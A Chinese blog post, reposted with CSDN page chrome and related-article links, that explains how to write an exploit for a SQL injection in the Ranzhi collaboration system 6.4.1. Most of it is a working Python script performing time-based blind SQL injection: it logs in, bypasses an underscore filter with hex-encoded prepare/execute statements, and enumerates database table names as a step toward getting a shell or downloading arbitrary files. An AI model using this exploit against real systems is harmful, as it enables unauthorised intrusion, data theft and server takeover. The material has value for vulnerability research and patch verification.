然之协同系统6.4.1 SQL注入之exp编写

最新推荐文章于 2024-05-04 09:38:05 发布
最新推荐文章于 2024-05-04 09:38:05 发布
阅读量214 收藏
点赞数
文章标签: 数据库 json php
原文链接:http://www.cnblogs.com/hac425/p/9416781.html
版权

前言

前面已经说明了 漏洞成因,这里介绍一下 exp 的编写。

正文

为了 getshell 或者是 任意文件下载, 我们需要修改 数据库中的 前缀sys_file 表, 所以我们的利用方式如下

  • 使用 sql 注入 获取程序数据库中任何一个表名, 取得前缀 pre
  • 然后向 presys_file 中插入目标路径。

mysql 5 中可以使用 information_schema  来获取指定数据库中的表。

paste image

在  information_schema   中的 tables 表里面存放着整个 mysql 里面保存的表的信息, table_schema 为 表所在的数据库, table_name 为表名。

所以使用

SELECT table_name FROM information_schema.tables where table_schema=database()

就可以得到 当前数据库的 所有表的表名(database() 返回当前的数据库名称)。

paste image

由于没有回显,需要使用一些 条件判断 相关的函数,这里我使用 if

select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,1 ,1))=16, SLEEP(3), 1)

if 的第一参数为 1 则返回第二个参数的值,否则返回 第3个参数的值.

上面的语句用到了子查询和 acsiisubstr 来对检索到的结果根据其 ascii 值进行枚举,如果枚举到了,就 sleep(3)

我们可以通过判断服务器的响应时间,来判断当前枚举位的具体值。

同时子查询只允许返回一行,所以使用 了 limit 0,1 来只返回第一条结果。

枚举表名的关键代码如下

    table_name = ""
    for i in range(1, table_len + 1):
        for j in range(1, 129):
            payload = get_payload_encode(
                '''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
                    i, j))

            start = time.time()
            requests.get(host)
            nor_time = (time.time() - start)

            start = time.time()
            requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
            att_time = (time.time() - start)
            if att_time - nor_time > 2:
                table_name += chr(j)
                print(table_name)
                break

还有一个注意的就是,程序过滤了 _, 这里使用 prepareexecute 组合进行绕过,因为 mysql 支持字符串使用 16 进制编码输入。

def get_payload_encode(payload):
    sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
    raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
    raw = json.dumps(raw)
    return base64.b64encode(raw.encode("utf-8"))  # str---> byte   用 encode

最后的 exp:

# coding=utf-8
import requests
import base64
import time
import json
import binascii
import re
import hashlib
import chardet


def get_md5(input):
    input = input.encode("utf-8")
    m = hashlib.md5()
    m.update(input)
    return m.hexdigest()

def get_payload_encode(payload):
    sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
    raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
    raw = json.dumps(raw)
    return base64.b64encode(raw.encode("utf-8"))  # str---> byte   用 encode


# get_db_name(host)


def get_table_name(host):
    path = "/cash/block-printTradeBlock.html?param="
    target = host + path
    # 查表名
    table_len = 0
    for i in range(1, 100):
        payload = get_payload_encode(
            '''select if((SELECT LENGTH(table_name)FROM information_schema.tables where table_schema=database() LIMIT 0,1)={}, SLEEP(3), 1);'''.format(
                i))
        start = time.time()
        requests.get(host)
        nor_time = (time.time() - start)

        start = time.time()
        requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
        att_time = (time.time() - start)

        if att_time - nor_time > 2:
            table_len = i
            break


    print("db_len: %d" %(table_len))

    table_name = ""
    for i in range(1, table_len + 1):
        for j in range(1, 129):
            payload = get_payload_encode(
                '''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
                    i, j))

            start = time.time()
            requests.get(host)
            nor_time = (time.time() - start)

            start = time.time()
            requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
            att_time = (time.time() - start)
            if att_time - nor_time > 2:
                table_name += chr(j)
                print(table_name)
                break


def login(url, username , password):
    target = url + "/sys/user-login.html"
    data = {"account": "admin", "password": "d4dba0bc2f7e946feaeacbdcdc167131",
                  "referer": "http://hack.ranzhi.top/sys/index.html", "rawPassword": "21232f297a57a5a743894a0e4a801fc3",
                  "keepLogin": "false"}

    res = requests.get(target, headers=headers)
    cookies['rid'] = res.cookies['rid']
    random = re.findall('v\.random = "(.*?)";', res.text)[0]

    # 生成登录需要的数据
    data['account'] = username
    data['referer'] = target
    data['rawPassword'] = get_md5(password)
    data['password'] = get_md5(get_md5(get_md5(password) + username) + random)

    res = requests.post(target, headers=headers, cookies=cookies, data=data)
    if "self.location" in res.content.decode("utf-8"):
        print("登录成功,下面开始 exploit")
    else:
        print("登录失败")
        exit(0)


if __name__ == '__main__':
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080", }

    cookies = {"lang": "zh-cn", "theme": "default", "keepLogin": "false", "rid": "6n6panbh36uqiqj4k5o0nbscq2",
               " XDEBUG_SESSION": "19857"}
    headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
               "Referer": "http://hack.ranzhi.top/sys/index.php", "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}

    host = "http://hack.ranzhi.top:80/"
    # get_table_name(host)

    login(host, "test", "111111")
    get_table_name(host)

转载于:https://www.cnblogs.com/hac425/p/9416781.html

weixin_30672019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
蝉知企业门户系统 v6.4.1
11-29
蝉知企业门户系统是由业内资深开发团队开发的一款专向企业营销使用的企业门户系统,企业使用蝉知系统可以非常方便地搭建一个专业的企业营销网站,进行宣传,开展业务,服务客
然之协同系统漏洞利用汇总
vspiders的博客
03-21 4450
Author:Vspiders首发地址:https://xianzhi.aliyun.com/forum/topic/2135前言前段时间在做然之协同系统代码审计,这里做个简单的总结。第一弹:SQL注入漏洞0x01 注入漏洞分析问题出现在/lib/base/dao/dao.class.php文件中的orderBy函数中,public function orderBy($order) { i...
最新然之协同(包含专业版)及喧喧及时聊天系统远程命令执行漏洞详解
一个码农的笔记
02-27 2381
[+] Author: niexinming [+] Team: n0tr00t security team [+] From: http://www.n0tr00t.com [+] Create: 2018-2-27 关于漏洞 这个漏洞比较有趣,写出来给大家分享一下 这个漏洞影响的版本有ranzhi协同oa<=4.6.1(包含专业版)还有喧喧及时聊天系统<=1.3...
tidb load data file 失败_记一次失败的漏洞复现-然之协同.md
weixin_39888807的博客
11-27 190
这是2018年的一个漏洞,但是漏洞详情中没有给出具体的利用脚本和利用payload,于是准备先复现漏洞,但是调试一天无果,遂记之….0x00 介绍我的任务是为2018年的漏洞编写poc插件,同时复现环境。这个漏洞的分析链接是https://xz.aliyun.com/t/2073简要介绍一下该漏洞分析的流程,某个传参中未作过滤,导致可以执行该类里面的任意函数,然后通过调用这个函数来执行整个系统中的...
编写sql注入最基础的exp
CC210231的博客
04-03 1473
下面直接上代码: 使用html编写: <!DOCTYPE html> <html > <head> <meta charset="UTF-8"> <title></title> </head> <body> <!-method根据实际情况选择,action属性中为提交的地址,name属性中为参数名,
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1404
本例中以靶机DVWA中的盲注为例。
6.4.1 ARP协议之包传递1
08-04
6.4.1 ARP协议之包传递1
开源文档管理系统LogicalDOC v6.4.1
10-28
LogicalDOC是一个采用Java开发的基于网页的文档管理系统,提供了快速的索引功能和基于浏览器的查询功能。易于使用和学习。它利用最佳的Java技术,实现了强大而灵活的解决方案。为用户提供了强大的搜索引擎(基于...
SQL Direct v6.4.1 Full Source
05-15
SQLDirect 6.4.1 SQLDirect Component Library is a light-weight Borland Database Engine replacement for Borland/CodeGear/Embarcadero Delphi v.5 - 10, 2010, XE, XE2, XE3 and C++Builder v.5 - 2010, XE, ...
Xiaopan OS 6.4.1
05-07
Xiaopan OS是一个容易上手的无线渗透环境,无论是初学者还是无线安全专家均可轻松上手使用。里面包含许多流行的无线审计工具,可以安全审计WPA / WPA2 、 WEP密无线网络。
然之协同2.0版本发布
01-29
然之协同系统是一款面向中小企业的协同办公系统,它包括了客户管理、销售跟踪、日常办公等功能。然之协同由国内著名开源软件厂商青岛易软天创开发,以LGPL协议开源发行。然之协同管理系统1.7版本主要梳理权限设置、针对应用对用户进行权限控制,用户可以自定义左侧导航应用,对界面布局做了调整,操作起来更合理方便,还有大量细节的调整。经过一年的开发,然之从最初的1.0版本,经过10个版本的开发,然之终于升级到2.0版本。功能也日趋完善和丰富。2.0版本重新梳理了默认的权限设置,修复bug,完善细节,并把授权协议切换到了Z PUBLIC LICENSE V1.1。
然之协同管理系统 v4.6.2
10-14
然之协同管理系统由客户管理(crm)、日常办公(oa)、现金记账(cash)、团队分享(team)和应用导航(ips)五大模块组成,主要面向中小团队的企业内部管理。和市面上其他的产品相比,然之协同
然之协同管理系统 v4.2.3
10-23
然之协同管理系统由客户管理(crm)、日常办公(oa)、现金记账(cash)、团队分享(team)和应用导航(ips)五大模块组成,主要面向中小团队的企业内部管理。和市面上其他的产品相比,然之协同更专注于提供一体化、精简的解决方案。然之协同管理系统 v4.2.2 修改记录:1、内置喧喧1.1.1然之服务器端2、增设置考勤签到途径的功能3、增设置然之和xxd服务器通信密钥的功能4、现金流年度收支表按科目统计时金额统一计算到二级科目(包括二级科目下的子科目)5、修复设置货币币种的时候报错的问题
使用python进行sql布尔盲注exp编写
CC210231的博客
04-04 2525
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
然之协同系统6.4.1 SQL注入导致getshell
weixin_30782293的博客
08-03 379
前言 先知上一个大佬挖的洞,也有了简单的分析 https://xianzhi.aliyun.com/forum/topic/2135 我自己复现分析过程,漏洞的原理比较简单,但是漏洞的利用方式对我而言则是一种新的利用方式。本文对分析过程做一个记录。 正文 分析软件运行的流程 拿到一个需要分析的 php 程序,首先看看客户端的 http 请求是如何对应到程序中的代码的。 首先得找一个分析的开始点...
Redis 实战之压缩列表
最新发布
奔走的蚂蚁的博客
05-04 805
压缩列表是一种为节约内存而开发的顺序型数据结构。压缩列表被用作列表键和哈希键的底层实现之一。压缩列表可以包含多个节点,每个节点可以保存一个字节数组或者整数值。添新节点到压缩列表, 或者从压缩列表中删除节点, 可能会引发连锁更新操作, 但这种操作出现的几率并不高。
报表控件Stimulsoft在JavaScript报告工具中的事件:查看器事件(上)
励志做最业余的专业博主,控件产品可以私我~
04-28 847
在本文中,我们为JS报告工具中的查看器事件提供了全面的指南,包括它们的详细描述、参数列表等一系列详细内容。
基于Springboot的旅游管理系统(有报告)。Javaee项目,springboot项目。
XING的博客
05-03 910
基于Springboot的旅游管理系统(有报告)。Javaee项目,springboot项目。数据库作为系统数据储存平台,实现了基于B/S结构的Web系统。界面简洁,操作简单。采用M(model)V(view)C(controller)三层体系结构,通过。
【课堂练习】
JacksonLeo的博客
04-29 487
虽然现代JVM的垃圾回收机制已经非常高效,但是在性能敏感的场合,仍然需要注意对象的创建频率。例如,在SysLogininforMapper中的deleteLogininforByIds方法,如果处理大量ID时,应考虑使用批处理技术,而不是循环单条处理。例如,在SysMenuMapper中的查询方法,如果涉及到复杂的查询条件或者大量数据的查询,应确保SQL语句的优化和索引的使用。异常处理:代码中应该有更明确的异常处理逻辑,比如使用try-catch块捕获可能的异常,并进行适当的处理,如记录日志、回滚事务等。
nvm 下载6.4.1
08-18
您可以通过以下步骤在nvm中下载npm 6.4.1版本: 1. 首先,确保您已经安装了nvm。您可以使用命令`brew install nvm`来安装nvm。 2. 安装完成后,按照安装说明更新~/.bash_profile文件。您可以使用文本编辑器打开该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值